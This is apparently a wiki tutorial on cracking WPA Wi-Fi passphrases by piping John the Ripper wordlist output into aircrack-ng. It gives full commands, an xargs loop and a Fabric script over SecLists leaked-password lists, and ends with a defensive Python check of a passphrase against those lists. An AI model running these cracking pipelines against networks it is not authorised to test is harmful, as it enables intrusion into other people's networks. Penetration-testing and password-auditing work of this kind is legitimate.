From charlesreid1

Revision as of 17:42, 1 August 2015 by Admin (talk | contribs)

What is Aircrack

We have met Aircrack before - it's a tool used for sniffing out the right WEP and WPA packets to crack the network's encryption. One of the last steps, once you've captured the proper packets, is to brute-force guess the WPA passphrase. This is where John can help.

What is John

John the Ripper is a tool for guessing weak passwords on user accounts. It's good at generating large numbers of candidate passwords that are based on words, modifications of words, or numbers.

You can use John in conjunction with Aircrack, by telling John to just print out all of the words it has generated to stdout, and then using stdout as the aircrack wordlist/dictionary. This allows you to just let John crank away. There are certainly better ways to do it, but this can be a quick check for weak passwords.

Getting Set Up

To use Aircrack with John, you'll need to make sure you have both installed. If you're on Kali you're good to go.

John Modes

You can use John in multiple different modes, and depending on the mode, you'll either be waiting a few minutes, or a few years. Choose wisely.

Incremental All Mode (Exhaustive)

If you call John with the --incremental=all flag, that specifies incremental mode, which will go through every single painstaking combination. This means we don't have to supply a wordlist, but it also means we're going to be coming up with a lot of garbage guesses.

Specifying a Wordlist

If you want to specify a wordlist for John to use (like one of the many fantastic password lists in this Github repo: https://github.com/danielmiessler/SecLists), you can do so with the -w flag:

-w=password.lst


John-Aircrack Command

There is no "final" John-to-Aircrack command, at least not until the passphrase is cracked.

The first one I tried looked like this:

$ john -w=10_million_password_list_top_1000.txt --session=attack1 --stdout | aircrack-ng -a 2 -e ASDF asdf-01.cap -w -

Let's go through this one bit at a time:

-w=10_million_password_list_top_1000.txt: the wordlist John reads its candidate passwords from (-w is shorthand for --wordlist).

--session=attack1: this tells John to keep track of where it is in the process and which passwords it has guessed, which makes it possible to restore the session (with --restore=attack1) in case the process dies or is interrupted.

--stdout: print all the words John would otherwise have tried itself to stdout, so that some other program can use them.

-a 2: this selects aircrack-ng's WPA-PSK attack mode, which covers WPA2 pre-shared keys as well (-a 1 is WEP).

-e ASDF: this is the name of the wireless network whose WPA passphrase we're trying to crack

asdf-01.cap: this is the capture file written by our earlier airodump-ng run.

-w -: the -w flag specifies a wordlist. Since, in this case, - by itself represents stdin (what John is piping in), this means we're using John's generated words as an aircrack wordlist.

Using Multiple Wordlists with John the Ripper

You can combine xargs with John to use one wordlist at a time:

$ ls ~/wordlists/*.txt | xargs -t -I% john --session=attack1 --wordlist=%    [etc..... ]

So to put it all together: we will issue a one-line command. It will iterate through each wordlist in a given directory. For each wordlist, it will run John with that wordlist, and John will print a variety of words to try based on that wordlist. That output is then piped to Aircrack.

$ ls ~/wordlists/*.txt | xargs -t -I% john --session=attack1 --wordlist=%  --stdout | aircrack-ng -a 2 -e ASDF asdf-01.cap -w -

This will use all of our wordlists to try to crack the encryption on the network ASDF, where asdf-01.cap is the capture file airodump-ng created and it contains at least one handshake.

Scripting with Python

Aircrack's main/default interface is NOT scripting-friendly. For example, when you run aircrack on a capture file and it finds a matching passphrase, it prints the result to the screen, but it doesn't save it to a file. Inexplicably. So if you accidentally close your window after ten days of cranking away, then, too bad, I guess?!?

Then there's the complication that if you run these jobs in the background with tmux or screen, the output gets completely screwed up if you change window widths, and you CANNOT see Aircrack's results printed to the screen once the output is mangled. What a mess.

So let's talk about how to make them slightly more scriptable with Python.

Installing Fab

We'll use fab, the command-line tool from the Fabric Python library, which gives Python Makefile-like functionality: tasks are plain Python functions in a fabfile.py that you run by name.

Before, we were stringing together a long command, where we piped names of text files from ls to john to aircrack.

Let's use fab instead. We'll be replacing this command line:

ls ~/codes/seclists/Passwords/*.txt | xargs -t -I% john --session=tig --wordlist=% --stdout | aircrack-ng -a 2 -e Tig tig-02.cap -w -

Getting List of Wordlist Files

First step is to get a Python list populated by text file names. This goes in a fabfile.py:

from fabric.api import local

def get_wordlist_list():
    # Run ls locally and capture its output instead of letting it print
    raw = local('/bin/ls -1 /root/codes/seclists/Passwords/*.txt', capture=True)
    # One wordlist path per line of output
    wordlist_list = raw.splitlines()
    return wordlist_list

and run like so:

$ fab get_wordlist_list

Using the List of Wordlists

Now how can we use this list of wordlists?

Here's a quick example of constructing a call to john using a particular wordlist, giving each run its own session name:

from fabric.api import local

def get_wordlist_list():
    raw = local('/bin/ls -1 /root/codes/seclists/Passwords/*.txt', capture=True)
    wordlist_list = raw.splitlines()
    # Build one john command per wordlist, numbering the sessions
    for iw, wordlist in enumerate(wordlist_list):
        print("john --session=sess%d --wordlist=%s --stdout" % (iw, wordlist))

with the result:

$ fab get_wordlist_list
[localhost] local: /bin/ls -1 /root/codes/seclists/Passwords/*.txt
john --session=sess0 --wordlist=/root/codes/seclists/Passwords/10k_most_common.txt --stdout
john --session=sess1 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_1000000.txt --stdout
john --session=sess2 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_100000.txt --stdout
john --session=sess3 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_10000.txt --stdout
john --session=sess4 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_1000.txt --stdout
john --session=sess5 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_100.txt --stdout
john --session=sess6 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_500.txt --stdout
john --session=sess7 --wordlist=/root/codes/seclists/Passwords/500-worst-passwords.txt --stdout
john --session=sess8 --wordlist=/root/codes/seclists/Passwords/adobe100.txt --stdout
john --session=sess9 --wordlist=/root/codes/seclists/Passwords/alleged-gmail-passwords.txt --stdout
john --session=sess10 --wordlist=/root/codes/seclists/Passwords/Basic_Spanish_List.txt --stdout
john --session=sess11 --wordlist=/root/codes/seclists/Passwords/best1050.txt --stdout
john --session=sess12 --wordlist=/root/codes/seclists/Passwords/best110.txt --stdout
john --session=sess13 --wordlist=/root/codes/seclists/Passwords/best15.txt --stdout
john --session=sess14 --wordlist=/root/codes/seclists/Passwords/bible-nocount.txt --stdout
john --session=sess15 --wordlist=/root/codes/seclists/Passwords/bible-withcount.txt --stdout
john --session=sess16 --wordlist=/root/codes/seclists/Passwords/carders.cc.txt --stdout
john --session=sess17 --wordlist=/root/codes/seclists/Passwords/conficker.txt --stdout
john --session=sess18 --wordlist=/root/codes/seclists/Passwords/darkc0de.txt --stdout
john --session=sess19 --wordlist=/root/codes/seclists/Passwords/elitehacker-nocount.txt --stdout
john --session=sess20 --wordlist=/root/codes/seclists/Passwords/elitehacker-withcount.txt --stdout
john --session=sess21 --wordlist=/root/codes/seclists/Passwords/english.txt --stdout
john --session=sess22 --wordlist=/root/codes/seclists/Passwords/faithwriters-nocount.txt --stdout
john --session=sess23 --wordlist=/root/codes/seclists/Passwords/faithwriters-withcount.txt --stdout
john --session=sess24 --wordlist=/root/codes/seclists/Passwords/german.txt --stdout
john --session=sess25 --wordlist=/root/codes/seclists/Passwords/hak5-nocount.txt --stdout
john --session=sess26 --wordlist=/root/codes/seclists/Passwords/hak5-withcount.txt --stdout
john --session=sess27 --wordlist=/root/codes/seclists/Passwords/honeynet-withcount.txt --stdout
john --session=sess28 --wordlist=/root/codes/seclists/Passwords/john.txt --stdout
john --session=sess29 --wordlist=/root/codes/seclists/Passwords/mubix_izmy.txt --stdout
john --session=sess30 --wordlist=/root/codes/seclists/Passwords/myspace-withcount.txt --stdout
john --session=sess31 --wordlist=/root/codes/seclists/Passwords/password-permutations.txt --stdout
john --session=sess32 --wordlist=/root/codes/seclists/Passwords/passwords_clarkson_82.txt --stdout
john --session=sess33 --wordlist=/root/codes/seclists/Passwords/passwords_john.txt --stdout
john --session=sess34 --wordlist=/root/codes/seclists/Passwords/passwords_youporn2012_raw.txt --stdout
john --session=sess35 --wordlist=/root/codes/seclists/Passwords/passwords_youporn2012.txt --stdout
john --session=sess36 --wordlist=/root/codes/seclists/Passwords/phpbb-withcount.txt --stdout
john --session=sess37 --wordlist=/root/codes/seclists/Passwords/porn-unknown-withcount.txt --stdout
john --session=sess38 --wordlist=/root/codes/seclists/Passwords/rockyou-10.txt --stdout
john --session=sess39 --wordlist=/root/codes/seclists/Passwords/rockyou-15.txt --stdout
john --session=sess40 --wordlist=/root/codes/seclists/Passwords/rockyou-20.txt --stdout
john --session=sess41 --wordlist=/root/codes/seclists/Passwords/rockyou-25.txt --stdout
john --session=sess42 --wordlist=/root/codes/seclists/Passwords/rockyou-30.txt --stdout
john --session=sess43 --wordlist=/root/codes/seclists/Passwords/rockyou-35.txt --stdout
john --session=sess44 --wordlist=/root/codes/seclists/Passwords/rockyou-40.txt --stdout
john --session=sess45 --wordlist=/root/codes/seclists/Passwords/rockyou-45.txt --stdout
john --session=sess46 --wordlist=/root/codes/seclists/Passwords/rockyou-50.txt --stdout
john --session=sess47 --wordlist=/root/codes/seclists/Passwords/rockyou-55.txt --stdout
john --session=sess48 --wordlist=/root/codes/seclists/Passwords/rockyou-5.txt --stdout
john --session=sess49 --wordlist=/root/codes/seclists/Passwords/rockyou-60.txt --stdout
john --session=sess50 --wordlist=/root/codes/seclists/Passwords/rockyou-65.txt --stdout
john --session=sess51 --wordlist=/root/codes/seclists/Passwords/rockyou-70.txt --stdout
john --session=sess52 --wordlist=/root/codes/seclists/Passwords/rockyou-75.txt --stdout
john --session=sess53 --wordlist=/root/codes/seclists/Passwords/rockyou.txt --stdout
john --session=sess54 --wordlist=/root/codes/seclists/Passwords/rockyou-withcount.txt --stdout
john --session=sess55 --wordlist=/root/codes/seclists/Passwords/singles.org-withcount.txt --stdout
john --session=sess56 --wordlist=/root/codes/seclists/Passwords/splashdata_2014.txt --stdout
john --session=sess57 --wordlist=/root/codes/seclists/Passwords/splashdata_2015.txt --stdout
john --session=sess58 --wordlist=/root/codes/seclists/Passwords/top_shortlist.txt --stdout
john --session=sess59 --wordlist=/root/codes/seclists/Passwords/twitter-banned.txt --stdout
john --session=sess60 --wordlist=/root/codes/seclists/Passwords/UserPassJay.txt --stdout
john --session=sess61 --wordlist=/root/codes/seclists/Passwords/wordpress_attacks_july2014.txt --stdout
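The same wordlist directory can be read from the other side of the table: before you configure a passphrase on a network you administer, check that it does not already sit in one of the lists that the loop above would feed to Aircrack. This is an added example (Python 3, standard library only), not code from the original page or from SecLists; it constructs two small sample files in the SecLists layout, where "-withcount" files prefix each entry with an occurrence count.

```python
import os
import re
import tempfile

# Constructed sample wordlists in the SecLists layout used on this page:
# "-nocount"/plain files hold one password per line; "-withcount" files
# prefix each password with an occurrence count, e.g. "   290729 123456".
SAMPLE_WORDLISTS = {
    "500-worst-passwords.txt": "123456\npassword\nletmein\n",
    "rockyou-withcount.txt": "  290729 123456\n   79076 12345\n   59462 iloveyou\n",
}

# Matches the "<count> <password>" layout of -withcount files
_COUNT_PREFIX = re.compile(r"^\s*\d+\s(.*)$")


def write_sample_wordlists(directory=None):
    """Write the constructed sample lists to a directory and return its path."""
    directory = directory or tempfile.mkdtemp(prefix="wordlists-")
    for name, body in SAMPLE_WORDLISTS.items():
        with open(os.path.join(directory, name), "w") as fh:
            fh.write(body)
    return directory


def iter_entries(path):
    """Yield candidate passwords from one wordlist, stripping the count
    column from -withcount files so "   290729 123456" yields "123456"."""
    withcount = "withcount" in os.path.basename(path)
    with open(path, "r", errors="replace") as fh:
        for line in fh:
            line = line.rstrip("\r\n")
            if withcount:
                m = _COUNT_PREFIX.match(line)
                if m:
                    line = m.group(1)
            if line:
                yield line


def find_passphrase(candidate, directory):
    """Return the names of wordlists containing the candidate exactly.
    An empty list means none of the lists in the directory contains it."""
    hits = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".txt"):
            continue
        if any(entry == candidate for entry in iter_entries(os.path.join(directory, name))):
            hits.append(name)
    return hits
```

An exact match is the weakest possible bar: John's wordlist mode also applies mangling rules, so a passphrase that is a listed word with a digit or capital letter bolted on is still within easy reach of the pipeline described on this page.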